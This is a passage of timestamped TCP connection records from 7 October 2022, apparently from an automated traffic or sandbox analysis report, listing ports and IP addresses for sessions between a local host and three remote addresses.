Oct 7, 2022 15:58:46.647680998 CEST	49705	443	192.168.2.5	157.240.20.35
Oct 7, 2022 15:58:46.647730112 CEST	443	49705	157.240.20.35	192.168.2.5
Oct 7, 2022 15:58:46.647772074 CEST	49705	443	192.168.2.5	157.240.20.35
Oct 7, 2022 15:58:46.647808075 CEST	443	49705	157.240.20.35	192.168.2.5
Oct 7, 2022 15:58:46.647857904 CEST	49705	443	192.168.2.5	157.240.20.35
Oct 7, 2022 15:58:46.648369074 CEST	443	49705	157.240.20.35	192.168.2.5
Oct 7, 2022 15:58:46.648416996 CEST	49705	443	192.168.2.5	157.240.20.35
Oct 7, 2022 15:58:46.648448944 CEST	443	49705	157.240.20.35	192.168.2.5
Oct 7, 2022 15:58:46.648493052 CEST	49705	443	192.168.2.5	157.240.20.35
Oct 7, 2022 15:58:46.649072886 CEST	443	49705	157.240.20.35	192.168.2.5
Oct 7, 2022 15:58:46.649307013 CEST	443	49705	157.240.20.35	192.168.2.5
Oct 7, 2022 15:58:46.649344921 CEST	49705	443	192.168.2.5	157.240.20.35
Oct 7, 2022 15:58:46.649357080 CEST	443	49705	157.240.20.35	192.168.2.5
Oct 7, 2022 15:58:46.649398088 CEST	49705	443	192.168.2.5	157.240.20.35
Oct 7, 2022 15:58:46.649399042 CEST	443	49705	157.240.20.35	192.168.2.5
Oct 7, 2022 15:58:46.649427891 CEST	443	49705	157.240.20.35	192.168.2.5
Oct 7, 2022 15:58:46.649467945 CEST	49705	443	192.168.2.5	157.240.20.35
Oct 7, 2022 15:58:46.649522066 CEST	443	49705	157.240.20.35	192.168.2.5
Oct 7, 2022 15:58:46.649569035 CEST	49705	443	192.168.2.5	157.240.20.35
Oct 7, 2022 15:58:46.649596930 CEST	443	49705	157.240.20.35	192.168.2.5
Oct 7, 2022 15:58:46.650316000 CEST	443	49705	157.240.20.35	192.168.2.5
Oct 7, 2022 15:58:46.650368929 CEST	49705	443	192.168.2.5	157.240.20.35
Oct 7, 2022 15:58:46.650382042 CEST	443	49705	157.240.20.35	192.168.2.5
Oct 7, 2022 15:58:46.650408030 CEST	443	49705	157.240.20.35	192.168.2.5
Oct 7, 2022 15:58:46.650460005 CEST	49705	443	192.168.2.5	157.240.20.35
Oct 7, 2022 15:58:46.650470972 CEST	443	49705	157.240.20.35	192.168.2.5
Oct 7, 2022 15:58:46.650489092 CEST	443	49705	157.240.20.35	192.168.2.5
Oct 7, 2022 15:58:46.650537014 CEST	49705	443	192.168.2.5	157.240.20.35
Oct 7, 2022 15:58:46.650547028 CEST	443	49705	157.240.20.35	192.168.2.5
Oct 7, 2022 15:58:46.657706976 CEST	443	49705	157.240.20.35	192.168.2.5
Oct 7, 2022 15:58:46.657861948 CEST	443	49705	157.240.20.35	192.168.2.5
Oct 7, 2022 15:58:46.657905102 CEST	49705	443	192.168.2.5	157.240.20.35
Oct 7, 2022 15:58:46.657939911 CEST	443	49705	157.240.20.35	192.168.2.5
Oct 7, 2022 15:58:46.657974005 CEST	443	49705	157.240.20.35	192.168.2.5
Oct 7, 2022 15:58:46.658004999 CEST	49705	443	192.168.2.5	157.240.20.35
Oct 7, 2022 15:58:46.658021927 CEST	443	49705	157.240.20.35	192.168.2.5
Oct 7, 2022 15:58:46.658086061 CEST	443	49705	157.240.20.35	192.168.2.5
Oct 7, 2022 15:58:46.658135891 CEST	49705	443	192.168.2.5	157.240.20.35
Oct 7, 2022 15:58:46.658149958 CEST	443	49705	157.240.20.35	192.168.2.5
Oct 7, 2022 15:58:46.658186913 CEST	49705	443	192.168.2.5	157.240.20.35
Oct 7, 2022 15:58:46.658202887 CEST	443	49705	157.240.20.35	192.168.2.5
Oct 7, 2022 15:58:46.658235073 CEST	443	49705	157.240.20.35	192.168.2.5
Oct 7, 2022 15:58:46.658279896 CEST	49705	443	192.168.2.5	157.240.20.35
Oct 7, 2022 15:58:46.658354044 CEST	443	49705	157.240.20.35	192.168.2.5
Oct 7, 2022 15:58:46.658401966 CEST	49705	443	192.168.2.5	157.240.20.35
Oct 7, 2022 15:58:46.658452988 CEST	443	49705	157.240.20.35	192.168.2.5
Oct 7, 2022 15:58:46.658498049 CEST	49705	443	192.168.2.5	157.240.20.35
Oct 7, 2022 15:58:46.658782005 CEST	443	49705	157.240.20.35	192.168.2.5
Oct 7, 2022 15:58:46.658829927 CEST	49705	443	192.168.2.5	157.240.20.35
Oct 7, 2022 15:58:46.658931017 CEST	443	49705	157.240.20.35	192.168.2.5
Oct 7, 2022 15:58:46.658989906 CEST	49705	443	192.168.2.5	157.240.20.35
Oct 7, 2022 15:58:46.659033060 CEST	443	49705	157.240.20.35	192.168.2.5
Oct 7, 2022 15:58:46.659090042 CEST	49705	443	192.168.2.5	157.240.20.35
Oct 7, 2022 15:58:46.659606934 CEST	443	49705	157.240.20.35	192.168.2.5
Oct 7, 2022 15:58:46.659666061 CEST	49705	443	192.168.2.5	157.240.20.35
Oct 7, 2022 15:58:46.659704924 CEST	443	49705	157.240.20.35	192.168.2.5
Oct 7, 2022 15:58:46.659847021 CEST	49705	443	192.168.2.5	157.240.20.35
Oct 7, 2022 15:58:46.659996033 CEST	443	49705	157.240.20.35	192.168.2.5
Oct 7, 2022 15:58:46.660070896 CEST	49705	443	192.168.2.5	157.240.20.35
Oct 7, 2022 15:58:46.660144091 CEST	443	49705	157.240.20.35	192.168.2.5
Oct 7, 2022 15:58:46.660206079 CEST	49705	443	192.168.2.5	157.240.20.35
Oct 7, 2022 15:58:46.660495043 CEST	443	49705	157.240.20.35	192.168.2.5
Oct 7, 2022 15:58:46.660562038 CEST	49705	443	192.168.2.5	157.240.20.35
Oct 7, 2022 15:58:46.660649061 CEST	443	49705	157.240.20.35	192.168.2.5
Oct 7, 2022 15:58:46.660702944 CEST	49705	443	192.168.2.5	157.240.20.35
Oct 7, 2022 15:58:46.660778046 CEST	443	49705	157.240.20.35	192.168.2.5
Oct 7, 2022 15:58:46.660824060 CEST	49705	443	192.168.2.5	157.240.20.35
Oct 7, 2022 15:58:46.660886049 CEST	443	49705	157.240.20.35	192.168.2.5
Oct 7, 2022 15:58:46.660928011 CEST	49705	443	192.168.2.5	157.240.20.35
Oct 7, 2022 15:58:46.661319971 CEST	443	49705	157.240.20.35	192.168.2.5
Oct 7, 2022 15:58:46.661372900 CEST	49705	443	192.168.2.5	157.240.20.35
Oct 7, 2022 15:58:46.661429882 CEST	443	49705	157.240.20.35	192.168.2.5
Oct 7, 2022 15:58:46.661478043 CEST	49705	443	192.168.2.5	157.240.20.35
Oct 7, 2022 15:58:46.661537886 CEST	443	49705	157.240.20.35	192.168.2.5
Oct 7, 2022 15:58:46.661582947 CEST	49705	443	192.168.2.5	157.240.20.35
Oct 7, 2022 15:58:46.661648035 CEST	443	49705	157.240.20.35	192.168.2.5
Oct 7, 2022 15:58:46.661755085 CEST	443	49705	157.240.20.35	192.168.2.5
Oct 7, 2022 15:58:46.661803007 CEST	49705	443	192.168.2.5	157.240.20.35
Oct 7, 2022 15:58:46.661828995 CEST	443	49705	157.240.20.35	192.168.2.5
Oct 7, 2022 15:58:46.662158966 CEST	443	49705	157.240.20.35	192.168.2.5
Oct 7, 2022 15:58:46.662220001 CEST	49705	443	192.168.2.5	157.240.20.35
Oct 7, 2022 15:58:46.662230968 CEST	443	49705	157.240.20.35	192.168.2.5
Oct 7, 2022 15:58:46.662273884 CEST	443	49705	157.240.20.35	192.168.2.5
Oct 7, 2022 15:58:46.662316084 CEST	49705	443	192.168.2.5	157.240.20.35
Oct 7, 2022 15:58:46.662324905 CEST	443	49705	157.240.20.35	192.168.2.5
Oct 7, 2022 15:58:46.662381887 CEST	443	49705	157.240.20.35	192.168.2.5
Oct 7, 2022 15:58:46.662498951 CEST	443	49705	157.240.20.35	192.168.2.5
Oct 7, 2022 15:58:46.662538052 CEST	49705	443	192.168.2.5	157.240.20.35
Oct 7, 2022 15:58:46.662547112 CEST	443	49705	157.240.20.35	192.168.2.5
Oct 7, 2022 15:58:46.662579060 CEST	443	49705	157.240.20.35	192.168.2.5
Oct 7, 2022 15:58:46.662617922 CEST	49705	443	192.168.2.5	157.240.20.35
Oct 7, 2022 15:58:46.662626982 CEST	443	49705	157.240.20.35	192.168.2.5
Oct 7, 2022 15:58:46.663038015 CEST	443	49705	157.240.20.35	192.168.2.5
Oct 7, 2022 15:58:46.663121939 CEST	443	49705	157.240.20.35	192.168.2.5
Oct 7, 2022 15:58:46.663151026 CEST	49705	443	192.168.2.5	157.240.20.35
Oct 7, 2022 15:58:46.663165092 CEST	443	49705	157.240.20.35	192.168.2.5
Oct 7, 2022 15:58:46.663197041 CEST	49705	443	192.168.2.5	157.240.20.35
Oct 7, 2022 15:58:46.663207054 CEST	443	49705	157.240.20.35	192.168.2.5
Oct 7, 2022 15:58:46.663254976 CEST	49705	443	192.168.2.5	157.240.20.35
Oct 7, 2022 15:58:46.663264036 CEST	443	49705	157.240.20.35	192.168.2.5
Oct 7, 2022 15:58:46.663301945 CEST	443	49705	157.240.20.35	192.168.2.5
Oct 7, 2022 15:58:46.663341999 CEST	49705	443	192.168.2.5	157.240.20.35
Oct 7, 2022 15:58:46.663350105 CEST	443	49705	157.240.20.35	192.168.2.5
Oct 7, 2022 15:58:46.663376093 CEST	443	49705	157.240.20.35	192.168.2.5
Oct 7, 2022 15:58:46.663902998 CEST	443	49705	157.240.20.35	192.168.2.5
Oct 7, 2022 15:58:46.663949013 CEST	49705	443	192.168.2.5	157.240.20.35
Oct 7, 2022 15:58:46.663960934 CEST	443	49705	157.240.20.35	192.168.2.5
Oct 7, 2022 15:58:46.664030075 CEST	443	49705	157.240.20.35	192.168.2.5
Oct 7, 2022 15:58:46.664072990 CEST	49705	443	192.168.2.5	157.240.20.35
Oct 7, 2022 15:58:46.664082050 CEST	443	49705	157.240.20.35	192.168.2.5
Oct 7, 2022 15:58:46.664109945 CEST	443	49705	157.240.20.35	192.168.2.5
Oct 7, 2022 15:58:46.664112091 CEST	49705	443	192.168.2.5	157.240.20.35
Oct 7, 2022 15:58:46.664136887 CEST	443	49705	157.240.20.35	192.168.2.5
Oct 7, 2022 15:58:46.664189100 CEST	49705	443	192.168.2.5	157.240.20.35
Oct 7, 2022 15:58:46.664220095 CEST	443	49705	157.240.20.35	192.168.2.5
Oct 7, 2022 15:58:46.664264917 CEST	49705	443	192.168.2.5	157.240.20.35
Oct 7, 2022 15:58:46.664307117 CEST	443	49705	157.240.20.35	192.168.2.5
Oct 7, 2022 15:58:46.664347887 CEST	49705	443	192.168.2.5	157.240.20.35
Oct 7, 2022 15:58:46.664380074 CEST	443	49705	157.240.20.35	192.168.2.5
Oct 7, 2022 15:58:46.664423943 CEST	49705	443	192.168.2.5	157.240.20.35
Oct 7, 2022 15:58:46.664900064 CEST	443	49705	157.240.20.35	192.168.2.5
Oct 7, 2022 15:58:46.665085077 CEST	443	49705	157.240.20.35	192.168.2.5
Oct 7, 2022 15:58:46.665153980 CEST	49705	443	192.168.2.5	157.240.20.35
Oct 7, 2022 15:58:46.706912994 CEST	49705	443	192.168.2.5	157.240.20.35
Oct 7, 2022 15:58:59.868495941 CEST	49702	80	192.168.2.5	103.136.42.153
Oct 7, 2022 15:58:59.869832039 CEST	49706	80	192.168.2.5	103.136.42.153
Oct 7, 2022 15:58:59.895765066 CEST	80	49706	103.136.42.153	192.168.2.5
Oct 7, 2022 15:58:59.896292925 CEST	49706	80	192.168.2.5	103.136.42.153
Oct 7, 2022 15:58:59.897074938 CEST	49706	80	192.168.2.5	103.136.42.153
Oct 7, 2022 15:58:59.898761034 CEST	80	49702	103.136.42.153	192.168.2.5
Oct 7, 2022 15:58:59.898873091 CEST	49702	80	192.168.2.5	103.136.42.153
Oct 7, 2022 15:58:59.922918081 CEST	80	49706	103.136.42.153	192.168.2.5
Oct 7, 2022 15:58:59.923868895 CEST	80	49706	103.136.42.153	192.168.2.5
Oct 7, 2022 15:59:00.074120045 CEST	49706	80	192.168.2.5	103.136.42.153
Oct 7, 2022 15:59:00.318686008 CEST	49707	443	192.168.2.5	185.60.216.35
Oct 7, 2022 15:59:00.318762064 CEST	443	49707	185.60.216.35	192.168.2.5
Oct 7, 2022 15:59:00.318865061 CEST	49707	443	192.168.2.5	185.60.216.35
Oct 7, 2022 15:59:00.321877003 CEST	49707	443	192.168.2.5	185.60.216.35
Oct 7, 2022 15:59:00.321901083 CEST	443	49707	185.60.216.35	192.168.2.5
Oct 7, 2022 15:59:00.373717070 CEST	443	49707	185.60.216.35	192.168.2.5
Oct 7, 2022 15:59:00.373820066 CEST	49707	443	192.168.2.5	185.60.216.35
Oct 7, 2022 15:59:00.376852036 CEST	49707	443	192.168.2.5	185.60.216.35
Oct 7, 2022 15:59:00.376883030 CEST	443	49707	185.60.216.35	192.168.2.5
Oct 7, 2022 15:59:00.377721071 CEST	443	49707	185.60.216.35	192.168.2.5
Oct 7, 2022 15:59:00.378299952 CEST	49707	443	192.168.2.5	185.60.216.35
Oct 7, 2022 15:59:00.378331900 CEST	443	49707	185.60.216.35	192.168.2.5
Oct 7, 2022 15:59:00.520289898 CEST	443	49707	185.60.216.35	192.168.2.5
Oct 7, 2022 15:59:00.520410061 CEST	443	49707	185.60.216.35	192.168.2.5
Oct 7, 2022 15:59:00.520498037 CEST	443	49707	185.60.216.35	192.168.2.5
Oct 7, 2022 15:59:00.520565033 CEST	49707	443	192.168.2.5	185.60.216.35
Oct 7, 2022 15:59:00.520581961 CEST	443	49707	185.60.216.35	192.168.2.5
Oct 7, 2022 15:59:00.520611048 CEST	443	49707	185.60.216.35	192.168.2.5
Oct 7, 2022 15:59:00.520661116 CEST	49707	443	192.168.2.5	185.60.216.35
Oct 7, 2022 15:59:00.520692110 CEST	443	49707	185.60.216.35	192.168.2.5
Oct 7, 2022 15:59:00.520749092 CEST	49707	443	192.168.2.5	185.60.216.35
Oct 7, 2022 15:59:00.521676064 CEST	443	49707	185.60.216.35	192.168.2.5
Oct 7, 2022 15:59:00.521754980 CEST	49707	443	192.168.2.5	185.60.216.35
Oct 7, 2022 15:59:00.523302078 CEST	443	49707	185.60.216.35	192.168.2.5
Oct 7, 2022 15:59:00.523372889 CEST	49707	443	192.168.2.5	185.60.216.35
Oct 7, 2022 15:59:00.523386002 CEST	443	49707	185.60.216.35	192.168.2.5
Oct 7, 2022 15:59:00.523411036 CEST	443	49707	185.60.216.35	192.168.2.5
Oct 7, 2022 15:59:00.523473978 CEST	49707	443	192.168.2.5	185.60.216.35
Oct 7, 2022 15:59:00.537302017 CEST	443	49707	185.60.216.35	192.168.2.5
Oct 7, 2022 15:59:00.537383080 CEST	443	49707	185.60.216.35	192.168.2.5
Oct 7, 2022 15:59:00.537395000 CEST	49707	443	192.168.2.5	185.60.216.35
Oct 7, 2022 15:59:00.537440062 CEST	443	49707	185.60.216.35	192.168.2.5
Oct 7, 2022 15:59:00.537468910 CEST	49707	443	192.168.2.5	185.60.216.35
Oct 7, 2022 15:59:00.537780046 CEST	443	49707	185.60.216.35	192.168.2.5
Oct 7, 2022 15:59:00.537839890 CEST	49707	443	192.168.2.5	185.60.216.35
Oct 7, 2022 15:59:00.537858009 CEST	443	49707	185.60.216.35	192.168.2.5
Oct 7, 2022 15:59:00.539290905 CEST	443	49707	185.60.216.35	192.168.2.5
Oct 7, 2022 15:59:00.539355040 CEST	443	49707	185.60.216.35	192.168.2.5
Oct 7, 2022 15:59:00.539401054 CEST	49707	443	192.168.2.5	185.60.216.35
Oct 7, 2022 15:59:00.539432049 CEST	443	49707	185.60.216.35	192.168.2.5
Oct 7, 2022 15:59:00.539848089 CEST	49707	443	192.168.2.5	185.60.216.35
Oct 7, 2022 15:59:00.540616989 CEST	443	49707	185.60.216.35	192.168.2.5
Oct 7, 2022 15:59:00.540674925 CEST	443	49707	185.60.216.35	192.168.2.5
Oct 7, 2022 15:59:00.540685892 CEST	49707	443	192.168.2.5	185.60.216.35
Oct 7, 2022 15:59:00.540708065 CEST	443	49707	185.60.216.35	192.168.2.5
Oct 7, 2022 15:59:00.540759087 CEST	49707	443	192.168.2.5	185.60.216.35
Oct 7, 2022 15:59:00.541651964 CEST	443	49707	185.60.216.35	192.168.2.5
Oct 7, 2022 15:59:00.541732073 CEST	49707	443	192.168.2.5	185.60.216.35
Oct 7, 2022 15:59:00.542598009 CEST	443	49707	185.60.216.35	192.168.2.5
Oct 7, 2022 15:59:00.542669058 CEST	49707	443	192.168.2.5	185.60.216.35
Oct 7, 2022 15:59:00.542721987 CEST	443	49707	185.60.216.35	192.168.2.5
Oct 7, 2022 15:59:00.542781115 CEST	49707	443	192.168.2.5	185.60.216.35
Oct 7, 2022 15:59:00.543461084 CEST	443	49707	185.60.216.35	192.168.2.5
Oct 7, 2022 15:59:00.543545961 CEST	49707	443	192.168.2.5	185.60.216.35
Oct 7, 2022 15:59:00.543581009 CEST	443	49707	185.60.216.35	192.168.2.5
Oct 7, 2022 15:59:00.543641090 CEST	49707	443	192.168.2.5	185.60.216.35
Oct 7, 2022 15:59:00.544353008 CEST	443	49707	185.60.216.35	192.168.2.5
Oct 7, 2022 15:59:00.544423103 CEST	49707	443	192.168.2.5	185.60.216.35
Oct 7, 2022 15:59:00.545161009 CEST	443	49707	185.60.216.35	192.168.2.5
Oct 7, 2022 15:59:00.545232058 CEST	49707	443	192.168.2.5	185.60.216.35
Oct 7, 2022 15:59:00.545283079 CEST	443	49707	185.60.216.35	192.168.2.5
Oct 7, 2022 15:59:00.545342922 CEST	49707	443	192.168.2.5	185.60.216.35
Oct 7, 2022 15:59:00.546006918 CEST	443	49707	185.60.216.35	192.168.2.5
Oct 7, 2022 15:59:00.546106100 CEST	49707	443	192.168.2.5	185.60.216.35
Oct 7, 2022 15:59:00.546128988 CEST	443	49707	185.60.216.35	192.168.2.5
Oct 7, 2022 15:59:00.546153069 CEST	443	49707	185.60.216.35	192.168.2.5
Oct 7, 2022 15:59:00.546211004 CEST	49707	443	192.168.2.5	185.60.216.35
Oct 7, 2022 15:59:00.554538965 CEST	443	49707	185.60.216.35	192.168.2.5
Oct 7, 2022 15:59:00.554636955 CEST	49707	443	192.168.2.5	185.60.216.35
Oct 7, 2022 15:59:00.554661036 CEST	443	49707	185.60.216.35	192.168.2.5
Oct 7, 2022 15:59:00.554687023 CEST	443	49707	185.60.216.35	192.168.2.5
Oct 7, 2022 15:59:00.554738998 CEST	49707	443	192.168.2.5	185.60.216.35
Oct 7, 2022 15:59:00.555159092 CEST	443	49707	185.60.216.35	192.168.2.5
Oct 7, 2022 15:59:00.555272102 CEST	443	49707	185.60.216.35	192.168.2.5
Oct 7, 2022 15:59:00.555569887 CEST	49707	443	192.168.2.5	185.60.216.35
Oct 7, 2022 15:59:00.555599928 CEST	443	49707	185.60.216.35	192.168.2.5
Oct 7, 2022 15:59:00.555813074 CEST	443	49707	185.60.216.35	192.168.2.5
Oct 7, 2022 15:59:00.555881977 CEST	49707	443	192.168.2.5	185.60.216.35
Oct 7, 2022 15:59:00.555898905 CEST	443	49707	185.60.216.35	192.168.2.5
Oct 7, 2022 15:59:00.556092978 CEST	49707	443	192.168.2.5	185.60.216.35
Oct 7, 2022 15:59:00.556962967 CEST	443	49707	185.60.216.35	192.168.2.5
Oct 7, 2022 15:59:00.557070017 CEST	443	49707	185.60.216.35	192.168.2.5
Oct 7, 2022 15:59:00.557199001 CEST	49707	443	192.168.2.5	185.60.216.35
Oct 7, 2022 15:59:00.557209969 CEST	443	49707	185.60.216.35	192.168.2.5
Oct 7, 2022 15:59:00.557234049 CEST	443	49707	185.60.216.35	192.168.2.5
Oct 7, 2022 15:59:00.557339907 CEST	443	49707	185.60.216.35	192.168.2.5
Oct 7, 2022 15:59:00.557430029 CEST	443	49707	185.60.216.35	192.168.2.5
Oct 7, 2022 15:59:00.557487011 CEST	49707	443	192.168.2.5	185.60.216.35
Oct 7, 2022 15:59:00.557507992 CEST	443	49707	185.60.216.35	192.168.2.5
Oct 7, 2022 15:59:00.557555914 CEST	49707	443	192.168.2.5	185.60.216.35
Oct 7, 2022 15:59:00.558428049 CEST	443	49707	185.60.216.35	192.168.2.5
Oct 7, 2022 15:59:00.558547974 CEST	443	49707	185.60.216.35	192.168.2.5
Oct 7, 2022 15:59:00.558590889 CEST	49707	443	192.168.2.5	185.60.216.35
Oct 7, 2022 15:59:00.558612108 CEST	443	49707	185.60.216.35	192.168.2.5
Oct 7, 2022 15:59:00.559076071 CEST	443	49707	185.60.216.35	192.168.2.5
Oct 7, 2022 15:59:00.559082985 CEST	49707	443	192.168.2.5	185.60.216.35
Oct 7, 2022 15:59:00.559103012 CEST	443	49707	185.60.216.35	192.168.2.5
Oct 7, 2022 15:59:00.559160948 CEST	49707	443	192.168.2.5	185.60.216.35
Oct 7, 2022 15:59:00.559220076 CEST	443	49707	185.60.216.35	192.168.2.5
Oct 7, 2022 15:59:00.559289932 CEST	49707	443	192.168.2.5	185.60.216.35
Oct 7, 2022 15:59:00.559328079 CEST	443	49707	185.60.216.35	192.168.2.5
Oct 7, 2022 15:59:00.559385061 CEST	49707	443	192.168.2.5	185.60.216.35
Oct 7, 2022 15:59:00.559984922 CEST	443	49707	185.60.216.35	192.168.2.5
Oct 7, 2022 15:59:00.560058117 CEST	49707	443	192.168.2.5	185.60.216.35
Oct 7, 2022 15:59:00.560096979 CEST	443	49707	185.60.216.35	192.168.2.5
Oct 7, 2022 15:59:00.560153008 CEST	49707	443	192.168.2.5	185.60.216.35
Oct 7, 2022 15:59:00.560816050 CEST	443	49707	185.60.216.35	192.168.2.5
Oct 7, 2022 15:59:00.560882092 CEST	49707	443	192.168.2.5	185.60.216.35
Oct 7, 2022 15:59:00.560950041 CEST	443	49707	185.60.216.35	192.168.2.5
Oct 7, 2022 15:59:00.561003923 CEST	49707	443	192.168.2.5	185.60.216.35
Oct 7, 2022 15:59:00.561054945 CEST	443	49707	185.60.216.35	192.168.2.5
Oct 7, 2022 15:59:00.561534882 CEST	443	49707	185.60.216.35	192.168.2.5
Oct 7, 2022 15:59:00.561598063 CEST	49707	443	192.168.2.5	185.60.216.35
Oct 7, 2022 15:59:00.561614990 CEST	443	49707	185.60.216.35	192.168.2.5
Oct 7, 2022 15:59:00.561657906 CEST	443	49707	185.60.216.35	192.168.2.5
Oct 7, 2022 15:59:00.562058926 CEST	443	49707	185.60.216.35	192.168.2.5
Oct 7, 2022 15:59:00.562110901 CEST	49707	443	192.168.2.5	185.60.216.35
Oct 7, 2022 15:59:00.562124968 CEST	443	49707	185.60.216.35	192.168.2.5
Oct 7, 2022 15:59:00.562197924 CEST	443	49707	185.60.216.35	192.168.2.5
Oct 7, 2022 15:59:00.562254906 CEST	49707	443	192.168.2.5	185.60.216.35
Oct 7, 2022 15:59:00.562271118 CEST	443	49707	185.60.216.35	192.168.2.5
Oct 7, 2022 15:59:00.562310934 CEST	443	49707	185.60.216.35	192.168.2.5
Oct 7, 2022 15:59:00.562328100 CEST	49707	443	192.168.2.5	185.60.216.35
Oct 7, 2022 15:59:00.562339067 CEST	443	49707	185.60.216.35	192.168.2.5
Oct 7, 2022 15:59:00.562830925 CEST	443	49707	185.60.216.35	192.168.2.5
Oct 7, 2022 15:59:00.562891960 CEST	49707	443	192.168.2.5	185.60.216.35
Oct 7, 2022 15:59:00.562912941 CEST	443	49707	185.60.216.35	192.168.2.5
Oct 7, 2022 15:59:00.562958956 CEST	49707	443	192.168.2.5	185.60.216.35
Oct 7, 2022 15:59:00.563007116 CEST	443	49707	185.60.216.35	192.168.2.5
Oct 7, 2022 15:59:00.563059092 CEST	49707	443	192.168.2.5	185.60.216.35
Oct 7, 2022 15:59:00.563111067 CEST	443	49707	185.60.216.35	192.168.2.5
Oct 7, 2022 15:59:00.563159943 CEST	49707	443	192.168.2.5	185.60.216.35
Oct 7, 2022 15:59:00.563719034 CEST	443	49707	185.60.216.35	192.168.2.5
Oct 7, 2022 15:59:00.563786030 CEST	49707	443	192.168.2.5	185.60.216.35
Oct 7, 2022 15:59:00.563852072 CEST	443	49707	185.60.216.35	192.168.2.5
Oct 7, 2022 15:59:00.563908100 CEST	49707	443	192.168.2.5	185.60.216.35
Oct 7, 2022 15:59:00.563960075 CEST	443	49707	185.60.216.35	192.168.2.5
Oct 7, 2022 15:59:00.564014912 CEST	49707	443	192.168.2.5	185.60.216.35
Oct 7, 2022 15:59:00.572252035 CEST	443	49707	185.60.216.35	192.168.2.5
Oct 7, 2022 15:59:00.572361946 CEST	49707	443	192.168.2.5	185.60.216.35
Oct 7, 2022 15:59:00.572375059 CEST	443	49707	185.60.216.35	192.168.2.5
Oct 7, 2022 15:59:00.572400093 CEST	443	49707	185.60.216.35	192.168.2.5
Oct 7, 2022 15:59:00.572460890 CEST	49707	443	192.168.2.5	185.60.216.35
Oct 7, 2022 15:59:00.572519064 CEST	443	49707	185.60.216.35	192.168.2.5
Oct 7, 2022 15:59:00.572592020 CEST	49707	443	192.168.2.5	185.60.216.35
Oct 7, 2022 15:59:00.572644949 CEST	443	49707	185.60.216.35	192.168.2.5
Oct 7, 2022 15:59:00.572711945 CEST	49707	443	192.168.2.5	185.60.216.35
Oct 7, 2022 15:59:00.572756052 CEST	443	49707	185.60.216.35	192.168.2.5
Oct 7, 2022 15:59:00.572814941 CEST	49707	443	192.168.2.5	185.60.216.35
Oct 7, 2022 15:59:00.572880983 CEST	443	49707	185.60.216.35	192.168.2.5
Oct 7, 2022 15:59:00.572954893 CEST	49707	443	192.168.2.5	185.60.216.35
Oct 7, 2022 15:59:00.572994947 CEST	443	49707	185.60.216.35	192.168.2.5
Oct 7, 2022 15:59:00.573065996 CEST	49707	443	192.168.2.5	185.60.216.35
Oct 7, 2022 15:59:00.573103905 CEST	443	49707	185.60.216.35	192.168.2.5
Oct 7, 2022 15:59:00.573194981 CEST	49707	443	192.168.2.5	185.60.216.35
Oct 7, 2022 15:59:00.573251009 CEST	443	49707	185.60.216.35	192.168.2.5
Oct 7, 2022 15:59:00.573327065 CEST	49707	443	192.168.2.5	185.60.216.35
Oct 7, 2022 15:59:00.573357105 CEST	443	49707	185.60.216.35	192.168.2.5
Oct 7, 2022 15:59:00.573434114 CEST	49707	443	192.168.2.5	185.60.216.35
Oct 7, 2022 15:59:00.574160099 CEST	443	49707	185.60.216.35	192.168.2.5
Oct 7, 2022 15:59:00.574239016 CEST	49707	443	192.168.2.5	185.60.216.35
Oct 7, 2022 15:59:00.574290991 CEST	443	49707	185.60.216.35	192.168.2.5
Oct 7, 2022 15:59:00.574353933 CEST	49707	443	192.168.2.5	185.60.216.35
Oct 7, 2022 15:59:00.574404001 CEST	443	49707	185.60.216.35	192.168.2.5
Oct 7, 2022 15:59:00.574466944 CEST	49707	443	192.168.2.5	185.60.216.35
Oct 7, 2022 15:59:00.574525118 CEST	443	49707	185.60.216.35	192.168.2.5
Oct 7, 2022 15:59:00.574594975 CEST	49707	443	192.168.2.5	185.60.216.35
Oct 7, 2022 15:59:00.574630976 CEST	443	49707	185.60.216.35	192.168.2.5
Oct 7, 2022 15:59:00.574702978 CEST	49707	443	192.168.2.5	185.60.216.35
Oct 7, 2022 15:59:00.575361967 CEST	443	49707	185.60.216.35	192.168.2.5
Oct 7, 2022 15:59:00.575442076 CEST	49707	443	192.168.2.5	185.60.216.35
Oct 7, 2022 15:59:00.575710058 CEST	443	49707	185.60.216.35	192.168.2.5
Oct 7, 2022 15:59:00.575787067 CEST	49707	443	192.168.2.5	185.60.216.35
Oct 7, 2022 15:59:00.575824022 CEST	443	49707	185.60.216.35	192.168.2.5
Oct 7, 2022 15:59:00.575917959 CEST	49707	443	192.168.2.5	185.60.216.35
Oct 7, 2022 15:59:00.575949907 CEST	443	49707	185.60.216.35	192.168.2.5
Oct 7, 2022 15:59:00.576018095 CEST	49707	443	192.168.2.5	185.60.216.35
Oct 7, 2022 15:59:00.576056957 CEST	443	49707	185.60.216.35	192.168.2.5
Oct 7, 2022 15:59:00.576124907 CEST	49707	443	192.168.2.5	185.60.216.35
Oct 7, 2022 15:59:00.576529026 CEST	443	49707	185.60.216.35	192.168.2.5
Oct 7, 2022 15:59:00.576597929 CEST	49707	443	192.168.2.5	185.60.216.35
Oct 7, 2022 15:59:00.576656103 CEST	443	49707	185.60.216.35	192.168.2.5
Oct 7, 2022 15:59:00.576735973 CEST	49707	443	192.168.2.5	185.60.216.35
Oct 7, 2022 15:59:00.576777935 CEST	443	49707	185.60.216.35	192.168.2.5
Oct 7, 2022 15:59:00.576848984 CEST	49707	443	192.168.2.5	185.60.216.35
Oct 7, 2022 15:59:00.576888084 CEST	443	49707	185.60.216.35	192.168.2.5
Oct 7, 2022 15:59:00.576956987 CEST	49707	443	192.168.2.5	185.60.216.35
Oct 7, 2022 15:59:00.577006102 CEST	443	49707	185.60.216.35	192.168.2.5
Oct 7, 2022 15:59:00.577086926 CEST	49707	443	192.168.2.5	185.60.216.35
Oct 7, 2022 15:59:00.577461004 CEST	443	49707	185.60.216.35	192.168.2.5
Oct 7, 2022 15:59:00.577533960 CEST	49707	443	192.168.2.5	185.60.216.35
Oct 7, 2022 15:59:00.577588081 CEST	443	49707	185.60.216.35	192.168.2.5
Oct 7, 2022 15:59:00.577646017 CEST	49707	443	192.168.2.5	185.60.216.35
Oct 7, 2022 15:59:00.577697992 CEST	443	49707	185.60.216.35	192.168.2.5
Oct 7, 2022 15:59:00.577759027 CEST	49707	443	192.168.2.5	185.60.216.35
Oct 7, 2022 15:59:00.577807903 CEST	443	49707	185.60.216.35	192.168.2.5
Oct 7, 2022 15:59:00.577864885 CEST	49707	443	192.168.2.5	185.60.216.35
Oct 7, 2022 15:59:00.577922106 CEST	443	49707	185.60.216.35	192.168.2.5
Oct 7, 2022 15:59:00.577981949 CEST	49707	443	192.168.2.5	185.60.216.35
